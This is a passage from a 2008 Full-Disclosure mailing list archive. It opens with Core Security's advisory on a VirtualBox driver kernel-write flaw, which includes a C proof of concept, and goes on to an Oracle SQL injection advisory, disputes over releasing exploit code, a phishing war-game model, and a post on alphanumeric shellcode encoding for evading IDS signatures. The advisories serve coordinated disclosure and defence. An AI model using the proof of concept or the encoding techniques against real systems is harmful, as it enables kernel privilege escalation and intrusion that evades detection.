VBoxDrvNtDeviceControlSlow(pDevExt, pSession, pIrp, pStack); } - -----------/ At (1), we can see the sentence checking the IOCTL code. The constants use are defined at 'SUPDrvIOC.h' in this way: /----------- #define SUP_IOCTL_FAST_DO_RAW_RUN SUP_CTL_CODE_FAST(64) /** Fast path IOCtl: VMMR0_DO_HWACC_RUN */ #define SUP_IOCTL_FAST_DO_HWACC_RUN SUP_CTL_CODE_FAST(65) /** Just a NOP call for profiling the latency of a fast ioctl call to VMMR0. */ #define SUP_IOCTL_FAST_DO_NOP SUP_CTL_CODE_FAST(66) - -----------/ With the macro 'SUP_CTL_CODE_FAST()' defined in the same file: /----------- #define SUP_CTL_CODE_FAST(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, (Function) | SUP_IOCTL_FLAG, METHOD_NEITHER, FILE_WRITE_ACCESS) - -----------/ Now we know that the communication method used will be 'METHOD_NEITHER ' (this could also be easily seen by looking at the resulting IOCTL code in the disassembled binary). Then at (2) the value returned by 'supdrvIOCtlFast()' is saved in 'rc' and this is where the problem starts because at (3), the value in 'rc' is written directly to the buffer pointer sent from usermode without any check to validate that it is really pointing to an usermode address or even a valid one. In this scenario, it is possible to feed the IOCTL with kernel addresses to write the value returned by 'supdrvIOCtlFast()' ANY address in kernel space memory as many times as necessary to modify kernel code or kernel pointers to subsequently get code execution in ring 0 context (that means, with system privileges). This is the Proof of Concept I have made to trigger and show the vulnerability. This will generate a Blue Screen of Death (BSOD) trying to write to an unpaged kernel mode address (0x80808080) but any other arbitrary address could be used. /----------- // Author: Anibal Sacco (aLS) // Contact: anibal.sacco at coresecurity.com // anibal.sacco at gmail.com // Organization: Core Security Technologies #include #include int main(int argc, char **argv) { HANDLE hDevice; DWORD cb; char szDevice[] = "\\\\.\\VBoxDrv"; if ( (hDevice = CreateFileA(szDevice, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL) ) != INVALID_HANDLE_VALUE ) { printf("Device %s succesfully opened!\n", szDevice); } else { printf("Error: Error opening device %s\n",szDevice); } cb = 0; if (!DeviceIoControl(hDevice, 0x228103, (LPVOID)0x80808080,0, (LPVOID)0x80808080,0x0, &cb, NULL)) { printf("Error in DeviceIo ... bytes returned %#x\n",cb); } } - -----------/ *Report Timeline* . 2008-07-16: Core Security Technologies notifies the VirtualBox team of the vulnerability. . 2008-07-17: Vendor acknowledges notification. . 2008-07-29: Core asks the vendor for a status update in the fixing process. . 2008-07-30: Vendor notifies a patched version will be publicly available on Monday 4th, August. . 2008-07-31: Core asks the vendor to provide URL to their alert and to confirm which versions are vulnerable and which version will include the fix. . 2008-07-31: CVE ID request sent to Mitre. . 2008-07-31: Bugtraq ID request sent to SecurityFocus.com. . 2008-07-31: CVE ID received from Mitre. . 2008-07-31: Bugtraq ID received SecurityFocus.com. . 2008-08-01: Vendor provides draft version of Sun Alert and URL to reference it. . 2008-08-01: Core updates its security advisory with information about vulnerable and non-vulnerable packages. Core provides its URL to the vendor and indicates that the vendor cataloged the issue as a Denial of Service bug but it should be considered a privilege escalation problem since it allows unprivileged users to execute code in the kernel context. . 2008-08-04: Vendor confirms that this issue can lead to arbitrary code execution by an unprivileged user. . 2008-08-04: CORE-2008-0716 advisory is published. *References* [1] Sun Welcomes Innotek - http://www.sun.com/software/innotek/. [2] http://www.sun.com/aboutsun/pr/2008-05/sunflash.20080529.1.xml. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIl2jIyNibggitWa0RAtj0AJ9HSRe3Hq+SCqU0RfU2LwaxINL1NwCdH5p+ md6p6ZKbhrc7SfaD6EsxjoA= =kQyV -----END PGP SIGNATURE----- From arasm at vt.edu Mon Aug 4 22:34:09 2008 From: arasm at vt.edu (Memisyazici, Aras) Date: Mon, 4 Aug 2008 17:34:09 -0400 Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) In-Reply-To: <4897313A.2030607@appsecinc.com> References: <4897313A.2030607@appsecinc.com> Message-ID: <4C058118EC56B34E809904A5D0DA3087043716E6@elessar.cc.w2k.vt.edu> Umm... >> By default, users granted DBA have the required privilege. << So... You are saying, people should beware of DBAs (Database Administrators... AKA DB Gods) having the possibility to do SQL injection? Riighhtt... And why should they go through the trouble of exploiting a webapp to manipulate data in the DB? They're DBAs... As in they already CAN manipulate the data in the database since they sort of ADMINISTER it! Aras "Russ" Memisyazici Systems Administrator Office of Vice President for Research Virginia Tech -----Original Message----- From: Team SHATTER [mailto:shatter at appsecinc.com] Sent: Monday, August 04, 2008 12:42 PM To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk Subject: Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) August 4, 2008 Risk Level: Medium Affected versions: Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1 Remote exploitable: Yes (Authentication to Database Server is needed) Credits: This vulnerability was discovered and researched by Esteban Mart?nez Fay? of Application Security Inc. Details: The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user. Impact: Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges. Vendor Status: Vendor was contacted and a patch was released. Workaround: Restrict access to the SYS.DBMS_DEFER_SYS package. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2592 Timeline: Vendor Notification - 9/24/2007 Vendor Response - 9/28/2007 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXMToACgkQ9EOAcmTuFN3LGQCeK6pvkshjrIqiw8rdmE8tWIdK O9sAnjeSiwasj2U7SpoPhQVvYKyYvUMI =X2Bp -----END PGP SIGNATURE----- From hackbunny at s0ftpj.org Tue Aug 5 11:10:47 2008 From: hackbunny at s0ftpj.org (KJK::Hyperion) Date: Tue, 05 Aug 2008 12:10:47 +0200 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> Message-ID: <48982727.5020901@s0ftpj.org> modversion ha scritto: > I want a free static analysis tool for c/c++ code in win32 > platform,which do not need to compile the codes. have you tried Microsoft's PREfast? From biz.marqee at gmail.com Tue Aug 5 11:31:08 2008 From: biz.marqee at gmail.com (Biz Marqee) Date: Tue, 5 Aug 2008 20:31:08 +1000 Subject: [Full-disclosure] phish war game In-Reply-To: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net> References: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net> Message-ID: Dude give it up... No . One. Cares. At all. Accept that your ideas suck.. oh and you're an attention seeking douche bag -- or maybe a bad troll. I guess pegasusmail_html.cpp will answer my questions... On Tue, Aug 5, 2008 at 11:03 AM, lsi wrote: > BLUE TEAM: anti-phishing blacklist > RED TEAM: phish > GREEN TEAM: end-users > > starting degree of obfuscation: 0% (none) > starting number of blocked domains: 0 > > ---------- > > round 1: > > action: RED sends billions of phish > consequence: 5% of GREEN members are suckered and lose some cash > > action: BLUE blocks the top 20 phished domains using the FROM field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 0% > current number of blocked domains: 20 > > round 2: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 4% of GREEN members are suckered and lose some cash > > action: BLUE blocks the next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 20% > current number of blocked domains: 40 > > round 3: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 3% of GREEN members are suckered and lose some cash > > action: BLUE blocks the next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 24% > current number of blocked domains: 60 > > round 4: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 2% of GREEN members are suckered and lose some cash > > action: BLUE blocks the next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 28.8% > current number of blocked domains: 80 > > round 5: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 1% of GREEN members are suckered and lose some cash > > action: BLUE blocks the next top 20 phished domains using the FROM > field > consequence: 80% of RED members are forced to make new sites and find > new victims > > current degree of obfuscation: 34.56% > current number of blocked domains: 100 > > round 6: > > action: RED obfuscates their FROM fields by 20% and resends billions > of phish > consequence: 0% of GREEN members are suckered and lose some cash > > ---------- > > GAME OVER: RED loses at round 6, as 0% of GREEN members are suckered, > due to over-obfuscation. > > final degree of obfuscation: 41.47% > final number of blocked domains: 100 > > ---------- > > observations: > > 1. The model is over-simplified, in reality it's unlikely that BLUE > would consistently achieve 80%. However in reality it's also > unlikely that RED would enjoy a linear relationship between > obfuscation and success, specifically, the more RED obfuscates the > less success it has. Both teams might suffer diminishing returns > from their efforts. (for the purposes of the above model, these > effects have been allowed to cancel each other out) > > 2. The model has a constant 1% reduction in the victim rate, this is > debatable, however it will never go upwards, eg., there is nothing > RED can do to push that number back towards 100%. Conversely, > everything BLUE does pushes that number towards 0%. In addition, > other anti-phishing technologies will also be pushing the number > towards 0%. GREEN itself might even push the number down. > > 3. The model does not allow RED to increase the number of phish they > send. In reality, they way well do so. However they will blocked > faster in this case, not only by BLUE but also by other technologies, > such as spam filters. (for the purposes of the above model, these > effects have been allowed to cancel each other out) > > 4. The model does not allow the game to be terminated voluntarily. > In reality, RED will terminate the game voluntarily when phish > revenue per hour falls below revenues per hour available from other > sources. This will be some time before 0% of GREEN members are > suckered, perhaps as early as round 3. > > 5. The blacklist contains 100 items at the time RED loses. It may > contain as little as 60 at the time RED terminates voluntarily. > > ---------- > > links: > > (...) > http://en.wikipedia.org/wiki/Business_War_Games > > (this is a sales brochure, however it describes a war game a bit > nicer than wiki, it's got diagrams, for a start) > http://www.coleago.co.uk/uploads/Training/War%20Gaming.pdf > > (this isn't relevant to a war game, it might be something like what's > happening when the top 20 phished domains are used to select the > items to blacklist, OTOH, it might not, I don't know, I'm not a > statistician. I'd love to know the name of the technique, I use > something similar to optimise my spam rules...) > http://en.wikipedia.org/wiki/Monte_Carlo_method > > (this was mentioned in one of the papers I quoted previously) > http://en.wikipedia.org/wiki/Pareto_principle > > --- > Stuart Udall > stuart at at cyberdelix.dot net - http://www.cyberdelix.net/ > > --- > * Origin: lsi: revolution through evolution (192:168/0.2) > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/10b3f4b3/attachment.html From modversion at gmail.com Tue Aug 5 12:23:32 2008 From: modversion at gmail.com (modversion) Date: Tue, 5 Aug 2008 19:23:32 +0800 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <48982727.5020901@s0ftpj.org> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <48982727.5020901@s0ftpj.org> Message-ID: <005d01c8f6ed$b3f77440$1be65cc0$@com> Hi KJK: PREfast can only work with the Visual Studio,any standalone tools can make it ? -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of KJK::Hyperion Sent: Tuesday, August 05, 2008 6:11 PM Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] free static analysis tool for c/c++ modversion ha scritto: > I want a free static analysis tool for c/c++ code in win32 > platform,which do not need to compile the codes. have you tried Microsoft's PREfast? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From hackbunny at s0ftpj.org Tue Aug 5 12:27:31 2008 From: hackbunny at s0ftpj.org (KJK::Hyperion) Date: Tue, 05 Aug 2008 13:27:31 +0200 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <005d01c8f6ed$b3f77440$1be65cc0$@com> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <48982727.5020901@s0ftpj.org> <005d01c8f6ed$b3f77440$1be65cc0$@com> Message-ID: <48983923.7060600@s0ftpj.org> modversion ha scritto: > PREfast can only work with the Visual Studio,any standalone tools > can make it ? just run the command line compiler with the /analyze switch, no need to use Visual Studio From modversion at gmail.com Tue Aug 5 13:31:54 2008 From: modversion at gmail.com (modversion) Date: Tue, 5 Aug 2008 20:31:54 +0800 Subject: [Full-disclosure] free static analysis tool for c/c++ In-Reply-To: <48983923.7060600@s0ftpj.org> References: <1a349a070808040747o50472407x94c8229ae5940874@mail.gmail.com> <48982727.5020901@s0ftpj.org> <005d01c8f6ed$b3f77440$1be65cc0$@com> <48983923.7060600@s0ftpj.org> Message-ID: <006401c8f6f7$4072a7b0$c157f710$@com> Hi KJK: Thanks for your help :) I can not compile the code because I can touch them. The developer will upload their code and call the source code scan engine to find security bugs. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of KJK::Hyperion Sent: Tuesday, August 05, 2008 7:28 PM Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] free static analysis tool for c/c++ modversion ha scritto: > PREfast can only work with the Visual Studio,any standalone tools can > make it ? just run the command line compiler with the /analyze switch, no need to use Visual Studio _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From xploitable at gmail.com Tue Aug 5 13:58:55 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 5 Aug 2008 13:58:55 +0100 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <15949.1217821466@turing-police.cc.vt.edu> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> Message-ID: <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> On Mon, Aug 4, 2008 at 4:44 AM, wrote: > On Sun, 03 Aug 2008 22:36:09 BST, n3td3v said: > >> He has no excuse for what happened, he is a global international >> hacker leading the release of the exploit code, its his entire >> responsibility to make sure his company is secure, even if the servers >> that were vulnerable were owned by AT&T. > > And how, *exactly*, is he supposed to fix servers that aren't under his > administrative control? > > Tell you what - the next time that the company that you get Internet access > from has an issue, why don't you go ahead and fix it for them, and let us > know how that all works out, 'kay? > In security you're ment to think out of the box and think about ALL eventualities BEFORE something happens.. Why did he phone up and get the AT&T servers patched AFTER the incident and not BEFORE he released the exploit code to the world? Because he is a lamer who didn't think out of the box and didn't think about all eventualities BEFORE hand, therefore HD Moore on this occasion was a fucking lamer. Its funny how he managed to get the AT&T servers fixed NOT under his administrative control pretty damn quick AFTER the incident. Which makes us the security community believe he could have foreseen the obvious and get the AT&T servers fixed BEFORE the incident happened just as quick as AFTER it if he was as good at security as he makes out to be. Or are you gonna come out with the usual bull shit like, if HD Moore had phoned up BEFORE the incident, they wouldn't have listened to him or patched anything, so in fact the release of the exploit code is justified and the hack is justified because it leaned on AT&T to patch their infrastructure. The above paragraph is a flawed statement that I believe is bullshit, but one that security researchers use every day to loop hole and law and release exploit code and/or hack things. Even IBM are starting to wake up that releasing exploit code to make world safer is fundamentally flawed bull shit to loop hole the law to supply the bad guys with tools and/or code and to make a name for themselves, while NOT making the security situation any more stable out there on your web application and network security in the reality of things. HD Moore shouldn't have released the exploit code, thats the bottom line of things and whoever hacked his crap web site via AT&T shouldn't have done it, but who can HD Moore blame but himself? I suppose its all AT&T's fault that HD Moore's website got hacked, and not his... i've heard it all now. Its incredible the amount of bull shit you come out with Valdis to support your super hero HD Moore, and the release of exploit code to the wild as making web application and network security safer for everyone in the long term. I'm just glad a big player like IBM is waking up to the fundamental flaw in the excuse that security researchers give for supplying the bad guys with code, to get a name for themselves and that it doesn't make the world safer in reality. All the best, n3td3v From blah at blakogre.com Tue Aug 5 14:49:54 2008 From: blah at blakogre.com (blah) Date: Tue, 5 Aug 2008 06:49:54 -0700 Subject: [Full-disclosure] phish war game In-Reply-To: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net> References: <4897B4EA.1012.433AED8F@stuart.cyberdelix.net> Message-ID: <28f529ba0808050649n30938e0fu6ad32b58a5522653@mail.gmail.com> > > observations: > > 1. The model is over-simplified, in reality it's unlikely that BLUE > would consistently achieve 80%. However in reality it's also > unlikely that RED would enjoy a linear relationship between > obfuscation and success, specifically, the more RED obfuscates the > less success it has. Both teams might suffer diminishing returns > from their efforts. (for the purposes of the above model, these > effects have been allowed to cancel each other out) > > 2. The model has a constant 1% reduction in the victim rate, this is > debatable, however it will never go upwards, eg., there is nothing > RED can do to push that number back towards 100%. Conversely, > everything BLUE does pushes that number towards 0%. In addition, > other anti-phishing technologies will also be pushing the number > towards 0%. GREEN itself might even push the number down. > FLAWS: 1) This also assumes that no new users ever start using the Internet that may become new victims 2) It also assumes that all evolutions in phisher techniques are predictable. Anyone following the industry knows that all sorts of things have been done so that their phishes seem more realistic/plausible. And, after using these new techniques, RED can push the number of victims back up -- in direct contradiction of your statements, which do not reflect what happens. These 2 facts alone explain why phishing isn't the simple fix you have made it out to be. Your model is flawed, as it is based on flawed assumptions. not interesting anymore. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/86d6f003/attachment.html From xploitable at gmail.com Tue Aug 5 16:27:49 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 5 Aug 2008 16:27:49 +0100 Subject: [Full-disclosure] Fwd: Comment on: Microsoft to give partners heads-up on security vulnerabilities In-Reply-To: <4b6ee9310808050824q10183d31l79fd14328899ebc@mail.gmail.com> References: <4b6ee9310808050824q10183d31l79fd14328899ebc@mail.gmail.com> Message-ID: <4b6ee9310808050827g6c1d8026p127cefb8c41f1918@mail.gmail.com> ---------- Forwarded message ---------- From: n3td3v Date: Tue, Aug 5, 2008 at 4:24 PM Subject: Comment on: Microsoft to give partners heads-up on security vulnerabilities To: n3td3v by n3td3v August 5, 2008 8:17 AM Verbal contracts of non-disclosure agreements don't work, you need a new law in place, which I call the responsible disclosure act, http://seclists.org/fulldisclosure/2008/Jul/0439.html to enforce the agreement by a law if the agreement is broken. Or are you guys just gonna do another "oops the cat's out the bag" again like what happened with the verbal contract agreement Dan Kaminsky had with everyone before a blog entry leaked the vulnerability by *accident*. Is this Microsoft agreement of non-disclosure actually enforceable by any current law? If not a new law is needed to be drawn up, see the link above, or this "Microsoft Active Protection Program" is gonna turn out a complete shambles. http://news.cnet.com/8601-1009_3-10006325.html?communityId=2114&targetCommunityId=2114&messageId=772539#772539 From Avraham.Schneider at aladdin.com Tue Aug 5 17:00:16 2008 From: Avraham.Schneider at aladdin.com (Avraham Moshe Schneider) Date: Tue, 5 Aug 2008 19:00:16 +0300 Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection Message-ID: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org> I fixed a couple of bugs - 1. The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on 2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640" This translates to: _asm { push esp; pop eax; xor al, 0x36; xor al, 0x30; } The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa. You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly. The diff between the two XOR values should be the length of the resulting string. I used the EAX register, as XOR'ing it with an immediate value is alphanumeric. Regards, Avri ********************************************************************************************** The contents of this email and any attachments are confidential. It is intended for the named recipient(s) only. If you have received this email in error please notify the system manager or? the sender immediately and do not disclose the contents to anyone or make copies. ** eSafe scanned this email for viruses, vandals and malicious content ** ********************************************************************************************** -------------- next part -------------- A non-text attachment was scrubbed... Name: alnum_decoder_encoder.c Type: application/octet-stream Size: 105690 bytes Desc: alnum_decoder_encoder.c Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/fde6f12f/attachment.obj From Valdis.Kletnieks at vt.edu Tue Aug 5 18:08:30 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 05 Aug 2008 13:08:30 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: Your message of "Tue, 05 Aug 2008 13:58:55 BST." <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> Message-ID: <16480.1217956110@turing-police.cc.vt.edu> On Tue, 05 Aug 2008 13:58:55 BST, n3td3v said: > Why did he phone up and get the AT&T servers patched AFTER the > incident and not BEFORE he released the exploit code to the world? > Because he is a lamer who didn't think out of the box and didn't think > about all eventualities BEFORE hand, therefore HD Moore on this > occasion was a fucking lamer. Or - maybe he's more clued than you think, and he did an actual risk analysis. Remember - security is *tradeoffs*. He figures out what the costs would be to move his nameservice to some other site (remembering to include in *all* the incidental costs, such as paying the registrar fee, the dollars/hour it costs for the person on his payroll doing the paperwork, the opportunity cost of what he could *otherw8se* have been doing if he wasn't busy moving the DNS around). He figures out what the costs are if the ATT servers do get poisoned (not *that* much, because he's not doing a hell of a lot of e-commerce), and how long it will take him to get ATT to fix it if it breaks. Then he adds in the *FREE* publicity of getting quoted in all the trade journals (and remember, there's very little publicity that's bad publicity). Consider if he *had* spent his time moving his DNS instead of writing Metasploit rules - *nothing* would have happened, he'd have gotten *zero* mentions. Instead, he gets *two* mentions - one for releasing the Metasploit stuff, and a second for getting caught when ATT gets pwned. Add it all up, and he's probably *ahead* if he *doesn't* move his DNS SOA to elsewhere. > The above paragraph is a flawed statement that I believe is bullshit, Unfortunately for all clued whitehats out there, it's not bullshit. Unless you have something so blatantly obvious that they can get their tiny little brains wrapped around it, they're not going to listen. You say: "Insufficient bounds checking on the frobniz value allows an off-by-one exploit that may lead to unauthorized code execution" Clued professional: "Wow, that would suck." Unclued professional: "Yeah, whatever" "This is a wake-up call. If this was an actual emergency, this pop-up would be busy emptying your bank account." that *might* get their attention. Maybe. > but one that security researchers use every day to loop hole and law > and release exploit code and/or hack things. It's amazing how you've managed to make it to "jaded" without first figuring out how this industry actually works... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/345cb07c/attachment.bin From xploitable at gmail.com Tue Aug 5 18:40:32 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 5 Aug 2008 18:40:32 +0100 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <16480.1217956110@turing-police.cc.vt.edu> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> Message-ID: <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> On Tue, Aug 5, 2008 at 6:08 PM, wrote: > On Tue, 05 Aug 2008 13:58:55 BST, n3td3v said: >> Why did he phone up and get the AT&T servers patched AFTER the >> incident and not BEFORE he released the exploit code to the world? >> Because he is a lamer who didn't think out of the box and didn't think >> about all eventualities BEFORE hand, therefore HD Moore on this >> occasion was a fucking lamer. > > Or - maybe he's more clued than you think, and he did an actual risk analysis. > Remember - security is *tradeoffs*. > > He figures out what the costs would be to move his nameservice to some other > site (remembering to include in *all* the incidental costs, such as paying the > registrar fee, the dollars/hour it costs for the person on his payroll doing > the paperwork, the opportunity cost of what he could *otherw8se* have been > doing if he wasn't busy moving the DNS around). He figures out what the costs > are if the ATT servers do get poisoned (not *that* much, because he's not doing > a hell of a lot of e-commerce), and how long it will take him to get ATT to fix > it if it breaks. > > Then he adds in the *FREE* publicity of getting quoted in all the trade > journals (and remember, there's very little publicity that's bad publicity). > Consider if he *had* spent his time moving his DNS instead of writing > Metasploit rules - *nothing* would have happened, he'd have gotten *zero* > mentions. Instead, he gets *two* mentions - one for releasing the Metasploit > stuff, and a second for getting caught when ATT gets pwned. > > Add it all up, and he's probably *ahead* if he *doesn't* move his DNS SOA to > elsewhere. > Are you suggesting HD Moore had prior knowledge that the Austin Texas AT&T servers were vulnerable? Knowingly knew AT&T was vulnerable but purposely left it exposed to attack, so that he could get publicity for the tags "HD Moore", "Metasploit" and "Breaking Point" if the AT&T servers ever did get attacked? This sounds like something the intelligence services do, they know about an attack is possible but let it happen for political gains. What is it you're accusing HD Moore of Valdis, allowing an attack to happen like the intelligence services do all the time? This is a big allegation you've put forward Valdis, that AT&T and the authorities should look into.. > > It's amazing how you've managed to make it to "jaded" without first figuring > out how this industry actually works... > Yeah, i'm beginning to see how this industry works, false flag attacks, allowing attacks to happen for political gains, the corruption and the criminality. All the best, n3td3v From Valdis.Kletnieks at vt.edu Tue Aug 5 19:57:25 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Tue, 05 Aug 2008 14:57:25 -0400 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: Your message of "Tue, 05 Aug 2008 18:40:32 BST." <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> Message-ID: <21881.1217962645@turing-police.cc.vt.edu> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: > Are you suggesting HD Moore had prior knowledge that the Austin Texas > AT&T servers were vulnerable? No - simply saying that either they were vulnerable, or they weren't. If they weren't vulnerable, HD didn't have to do anything. And even if they *were*, somebody would still have to actually *attack* them. And even if they *got* attacked, it's quite possible that the upsides of not bothering to do something outweighed the risks. If you estimate that the cost (including "things you could have spent your time doing") is more than the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But in the time I'd waste dealing with the issue, I could generate something that will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore it, I come out $1,500 ahead if we get hit, and $2,000 if we don't". -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080805/189cae05/attachment.bin From xploitable at gmail.com Tue Aug 5 20:36:12 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 5 Aug 2008 20:36:12 +0100 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <21881.1217962645@turing-police.cc.vt.edu> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> 